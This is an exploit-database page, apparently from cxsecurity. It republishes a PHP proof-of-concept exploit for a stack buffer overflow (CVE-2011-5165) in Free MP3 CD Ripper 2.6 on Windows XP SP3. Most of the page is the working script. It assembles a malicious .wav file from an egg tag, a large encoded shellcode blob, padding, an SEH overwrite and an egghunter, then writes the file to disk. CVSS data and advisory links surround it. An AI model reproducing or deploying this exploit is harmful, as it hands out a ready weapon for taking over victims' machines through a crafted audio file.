Free MP3 CD Ripper 2.6 (wav) stack buffer overflow PoC exploit

2012.09.17
Credit: mr_me
Risk: High
Local: Yes
Remote: No
CVE: CVE-2011-5165
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<?php /*~~~~~~~~~~~~~~~~~ Free MP3 CD Ripper 2.6 (wav) 1day stack buffer overflow PoC exploit Found by: Richard leahy Author: mr_me - http://net-ninja.net/ Download: http://www.soft32.com/Download/Free/Free_MP3_CD_Ripper/4-250188-1.html Platform: Windows XP sp3 Greetz to: Corelan Security Team & Richard http://www.corelan.be:8800/index.php/security/corelan-team-members/ ~~~~~~~~~~~~~~~~~ Script provided 'as is', without any warranty. Use for educational purposes only. Do not use this code to do anything illegal ! Note : you are not allowed to edit/modify this code. If you do, Corelan cannot be held responsible for any damages this may cause. ~~~~~~~~~~~~~~~~~ */ $___eggsig = "\x57\x30\x30\x54\x57\x30\x30\x54"; // alpha3 encoded with edi as base reg // edi points directly after our tag thanks to the egghunter :) $___sc = "hffffk4diFkDwj02Dwk0D7AuEE8L3I4U3M4P0E310k7M0m2y0y2l0z". "0r0s2H0t2n0s7l0h2O0d2A111l0f2B14031P0C0s1K0x7l122O100C0v2N0q2I". "0p7K0q2E0c0s0p0s132N0r0V0p100i0d180r0r2z0z2j1K7o1K130w0L0t1l0t". "0b0w7O1M1K0a2v0w2Z1N150s7m0w7L0r2H0r2z0z7n1N2n1P2L0u7k1L7k0a7l". "1P130q1O0z090a2o1L7k0a141L2B0s0U1K0v0v2C0y2B1N2C1N061O7n0x7K0u". "7k0t7L0x0b0y2M0t110s0E0y2N0z7o1L0V0w7l0g7K0v2y0t7O0s2D0y2C1L7l". "0c2u0v2z0t0d0z080r1k1L7l0s101P091N130a7m0w060s0K1M2E1M150w2B1M". "7K0w7M0z7n1K2B1P100q2O0t2E1O2O1P7O0a120z2G0t1O1P2L0r1M1L2J0c09". "0a1L1K7p0a010u0x1M170v0r0u7o1N2x1M100s2N0u2N0y0z0z2A1O2q0x7N0p". "190a7N0s0n1K7O0z040t7l0f140u0M1M0S1K2Z1K160t061P051K061O0z0r07". "0r1P0r7o0r160s0I0s2o00VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE0". "2DWF0D71DJE8L3I4U3M4P0E316K7M6M691ILL1J1B1E181DLN1E7L6L6O1U611". "O1L1W6215131Q1E6PLK1ILL1LLO111E1FLN1GLM1D7K6P641W136PLM13LN1C1". "W1D6P1Y1U191B1B7K1KLL1M7L16131F1MLO1L1D7L197O1M1J1P601F7Z10151". "BLK19681C7L1B7J1L7O1J1O1Q681D1K1J7K7M121P13LO1O1K181PLN1MLO1V1". "T1M621B1T1K1G1G631H621K621O1711681H7M1E681D1Q1H1R1H7L1E10LO1N1". "ILN1KLO1K1H1F1B1W7K1F691D7N1B651M1U1MLM1V651F1T1D1T1K19191M1M1". "B1B1D1Q181K171PLM1B161B1M1M141M111D131M7J1C1Y1KLO1M121P161ALO1". "C191I1A1P7O1Q1216691D1O1Q7M1C1L1M7K7M681Q1M10141P161E681M161B1". "21DLN1O691M101B7O1D7O1M7Z1K601K1Q1H7K1D1H1Q7O1B6O1K1Q1K1R1ELL1". "V121D1M1L101J7Z1M7K1E161Q151J171J1K1C161B1QLN131CLM1B1ILMLO01W". "WYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIA". "IAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30AP". "B944JB3Y9Q8YJN8Y2QJT0X0P0Y0I0I0I0I0C0C0C0C0C0C0Q0Z0V0T0X03000V". "0X04110P0011030H0H00110000110B11110B0T11110Q02110B020B0B000B0B". "0X0P08110C0J0J0I0K0L0J0H0G040C000E0P0E0P0L0K0Q0U0G0L0L0K0C0L0E". "0U0B0X0E0Q0J0O0L0K0P0O0E0H0L0K0Q0O0Q000C010J0K0Q0Y0L0K0P040L0K". "0C010J0N0F0Q0I0P0L0Y0N0L0M0T0I0P0B0T0E0W0I0Q0I0Z0D0M0C010H0B0J". "0K0L040G0K0P0T0G0T0E0T0C0E0K0U0L0K0Q0O0G0T0E0Q0J0K0E060L0K0D0L". "0P0K0L0K0Q0O0E0L0C010J0K0L0K0E0L0L0K0E0Q0J0K0L0I0Q0L0F0D0D0D0H". "0C0Q0O0P010J0V0E000P0V0B0D0L0K0Q0V0P000L0K0Q0P0D0L0L0K0D000E0L". "0N0M0L0K0C0X0E0X0K090J0X0M0S0I0P0B0J0P0P0C0X0J0P0M0Z0D0D0Q0O0E". "080J080K0N0L0J0D0N0P0W0K0O0M070B0C0C0Q0B0L0B0C0C001111KPA"; $___offset = str_repeat("\x41",(4116-strlen($___eggsig)-strlen($___sc))); $___nseh = "\xeb\x06\x90\x90"; $___seh = "\x9e\x2e\xe4\x66"; $___hunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74". "\xEF\xB8\x57\x30\x30\x54\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"; $___buff = str_repeat("\x41",300); $_____b00m = $___eggsig.$___sc.$___offset.$___nseh.$___seh.$___hunter.$___buff; file_put_contents("cst-freemp3cdripper.wav",$_____b00m); ?>

References:

http://www.securityfocus.com/bid/39672
http://www.osvdb.org/63349
http://www.exploit-db.com/exploits/18142
http://www.exploit-db.com/exploits/17727
http://www.exploit-db.com/exploits/11976
http://www.exploit-db.com/exploits/11975
http://secunia.com/advisories/39193


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top